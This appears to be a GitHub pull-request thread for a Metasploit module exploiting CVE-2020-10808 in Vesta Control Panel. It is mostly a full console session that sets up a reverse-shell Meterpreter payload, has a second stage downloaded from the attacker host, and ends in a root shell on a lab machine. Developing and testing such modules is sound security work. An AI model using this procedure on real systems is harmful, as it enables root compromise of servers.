@mmetince Nope looks great. I'll probably make some edits to improve English and clarity but overall this is what I was after :)

2020-04-13 18:30 UTC, gwillcox-r7 approved these changes
Looks good, will need to make some edits for grammar and spelling but rest should be fine. Will also need to do some additional testing just to make sure some of the new logic additions work. Should land this soon though!

2020-04-13 21:46 UTC, gwillcox-r7 commented
Hello @mmetince I made some minor changes to your exploit in c151b93 to help improve some grammar and spelling issues and updated some output lines and comments to make things a bit easier for the end user to understand. The following is the output from testing it after these changes were made, showing that the exploit is still working as expected:

```
msf5 > use exploit/linux/http/vestacp_exec 
msf5 exploit(linux/http/vestacp_exec) > info

       Name: Vesta Control Panel Authenticated Remote Code Execution
     Module: exploit/linux/http/vestacp_exec
   Platform: Python
       Arch: python
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-03-17

Provided by:
  Mehmet Ince <mehmet@mehmetince.net>

Module side effects:
 ioc-in-logs
 config-changes

Module stability:
 crash-safe

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The password to login with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8083             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI of the vulnerable instance
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME                    yes       The username to login as
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authenticated command injection 
  vulnerability in the v-list-user-backups bash script file in Vesta 
  Control Panel to gain remote code execution as the root user.

References:
  https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/
  https://cvedetails.com/cve/CVE-2020-10808/

msf5 exploit(linux/http/vestacp_exec) > set USERNAME tester
USERNAME => tester
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD tester
PASSWORD => tester
msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.205.130
RHOSTS => 192.168.205.130
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.205.1
SRVHOST => 192.168.205.1
msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 9090
SRVPORT => 9090
msf5 exploit(linux/http/vestacp_exec) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf5 exploit(linux/http/vestacp_exec) > show options

Module options (exploit/linux/http/vestacp_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   tester           yes       The password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.205.130  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8083             yes       The target port (TCP)
   SRVHOST    192.168.205.1    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    9090             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of the vulnerable instance
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   tester           yes       The username to login as
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.205.1
LHOST => 192.168.205.1
msf5 exploit(linux/http/vestacp_exec) > set LPORT 3443
LPORT => 3443
msf5 exploit(linux/http/vestacp_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/vestacp_exec) > 
[*] Started reverse TCP handler on 192.168.205.1:3443 
[*] 192.168.205.130:8083 - Using URL: http://192.168.205.1:9090/aGLWKLje
[*] 192.168.205.130:8083 - Second payload download URI is http://192.168.205.1:9090/aGLWKLje
[+] 192.168.205.130:21 - Successfully authenticated to the FTP service
[+] 192.168.205.130:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.205.130:8083 - Retrieving cookie and csrf token values
[+] 192.168.205.130:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.205.130:8083 - Authenticating to HTTP Service with given credentials
[*] 192.168.205.130:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.205.130:8083 - Scheduled backup has been started ! 
[*] 192.168.205.130:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.130:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.130:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.130:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.205.130:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.205.130:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.205.130
[*] Meterpreter session 1 opened (192.168.205.1:3443 -> 192.168.205.130:33644) at 2020-04-13 16:40:07 -0500
[+] 192.168.205.130:8083 - Payload appears to have executed in the background. Enjoy the shells <3

msf5 exploit(linux/http/vestacp_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > shell
Process 20220 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 
```

2020-04-13 22:01 UTC, merged

2020-04-13 22:06 UTC, mmetince commented
Awesome ! Thank you very much for all of your effort on this PR, @gwillcox-r7 🤘🏻

2020-04-13 22:09 UTC, gwillcox-r7 commented
# Release Notes

This module adds support for exploiting  CVE-2020-10808, an authenticated command injection vulnerability within the `v-list-user-backups` script of Vesta Control Panel 0.9.8-26 and prior. Successful exploitation results in remote code execution as the `root` user.

2020-04-13 22:10 UTC, gwillcox-r7 commented
No problem @mmetince :)

2020-04-13 22:21 UTC, wvu-r7 commented
Amazing collaboration. Great work, guys!

2020-05-13 15:57 UTC, margo-gru commented
I'm getting error exploiting.
Current configuration and error is 
![image](https://user-images.githubusercontent.com/65300619/81835960-77f27980-9560-11ea-9ae1-284243f70650.png)
I've given all necessary options. Can you please help me ?

2020-05-13 16:00 UTC, bcoles commented
@margo-gru please create a [new issue](https://github.com/rapid7/metasploit-framework/issues/new/choose). Please also ensure you provide the relevant stack trace(s) from `framework.log`.